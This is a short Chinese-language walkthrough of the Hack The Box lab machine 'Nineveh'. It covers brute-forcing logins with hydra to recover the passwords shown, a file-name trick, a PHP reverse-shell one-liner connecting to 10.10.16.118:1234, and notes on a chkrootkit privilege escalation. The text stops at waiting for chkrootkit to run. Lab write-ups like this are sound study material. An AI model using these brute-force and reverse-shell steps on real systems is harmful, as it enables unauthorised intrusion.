Hack the box靶机 nineveh
添加10.10.10.43 nineveh.htb
到/etc/hosts
扫描网站目录
发现一个登录页面
直接hydra**账号
admin:1q2w3e4r5t
继续hydra
admin:password123
查看漏洞
没有返回
好像是必须在名称中包含ninevehNotes
可以了现在
nc连接
php -r ‘$sock=fsockopen(“10.10.16.118”,1234);exec("/bin/sh -i <&3 >&3 2>&3");’
拿到user
但是root就没思路了
只能借鉴大佬的了
之前发现的那个东西
是chkrootkit
等待chkrootkit运行